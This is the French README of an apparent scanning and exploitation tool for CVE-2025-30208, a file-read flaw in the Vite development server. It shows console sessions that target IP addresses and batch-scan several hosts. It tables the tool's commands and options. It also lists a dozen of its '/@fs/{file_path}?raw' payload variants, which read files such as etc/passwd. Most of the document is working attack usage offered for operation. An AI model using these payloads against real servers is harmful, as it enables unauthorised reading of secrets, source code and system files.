
CVE‑2025‑30208 est une vulnérabilité de lecture arbitraire de fichier de sévérité moyenne dans le serveur de développement Vite (un outil populaire de construction frontend).
Scanner de vulnérabilité avancé pour CVE-2025-30208 avec des fonctionnalités de niveau entreprise
Outil de test d'intrusion professionnel pour la détection de la vulnérabilité de lecture arbitraire de fichier Vite
🚀 Démarrage rapide • 📋 Fonctionnalités • 🔧 Utilisation • 📊 Exemples • 🛡️ Sécurité
Ceci est un scanner de vulnérabilité complet conçu pour détecter et exploiter la vulnérabilité CVE-2025-30208 dans les serveurs de développement Vite. Cette vulnérabilité permet un accès en lecture arbitraire de fichiers via les points de terminaison du système de fichiers de Vite, exposant potentiellement des fichiers de configuration sensibles, du code source et des informations système.
L'outil dispose désormais d'une architecture modulaire pour une meilleure maintenabilité et extensibilité :
CVE-2025-30208.py - Application de scan principalepayloads.py - Charges utiles d'exploitation avancées (60+ variations)sensitive_files.py - Base de données complète de fichiers sensibles (200+ fichiers)html_template.py - Modèle de rapport HTML amélioré style hackerpip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# Enable verbose mode for detailed output
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]
CVE-2025-30208 > scan
# Configure proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
# Set custom headers
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}
# Configure rate limiting
CVE-2025-30208 > rate
Enter rate limit: 1.0
# Generate beautiful HTML report
CVE-2025-30208 > pull
# Start web server to view report
CVE-2025-30208 > web
# Start web server on specific port
CVE-2025-30208 > web 8081
# Stop web server
CVE-2025-30208 > web off
| Commande | Description | Exemple |
|---|---|---|
set <option> <value> | Définir les options de configuration | set RHOST 192.168.1.100 |
show options | Afficher les paramètres actuels | show options |
edit | Éditeur interactif d'options | edit |
run / exploit | Lancer le test de vulnérabilité | run |
batch | Scanner plusieurs cibles par lots | batch |
scan | Découvrir les fichiers sensibles | scan |
pull | Exporter les résultats en HTML/JSON | pull |
web [on|off|port] | Serveur Web pour les rapports HTML | web 8080 |
save | Sauvegarder la configuration de session | save |
load | Charger la configuration de session | load |
test | Tester la connectivité vers la cible | test |
validate | Valider la configuration actuelle | validate |
verbose | Activer/désactiver le mode verbeux | verbose |
proxy | Configurer les paramètres proxy | proxy |
headers | Définir des en-têtes HTTP personnalisés | headers |
rate | Configurer la limitation de débit | rate |
log | Afficher les informations de journal | log |
help / ? | Afficher l'aide | help |
exit / quit | Quitter l'outil | exit |
| Option | Description | Défaut | Validation |
|---|---|---|---|
RHOST | Adresse hôte/IP cible | - | Validation nom d'hôte/IP |
RPORT | Numéro de port cible | - | Plage de ports (1-65535) |
FILEPATH | Chemin du fichier à tester | etc/passwd | Validation du chemin |
PROXY | URL du proxy HTTP/HTTPS | - | Validation du format URL |
VERBOSE | Activer la sortie verbeuse | false | Validation booléenne |
RATE_LIMIT | Délai entre les requêtes (secondes) | 0.3 | Validation numérique |
THREADS | Nombre de threads pour le scan par lots | 5 | Validation entière |
TIMEOUT | Délai d'attente de requête (secondes) | 5 | Validation entière |
CUSTOM_HEADERS | En-têtes HTTP personnalisés (JSON) | {} | Validation du format JSON |
Le scanner utilise désormais plus de 60 variations de charges utiles organisées dans payloads.py :
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8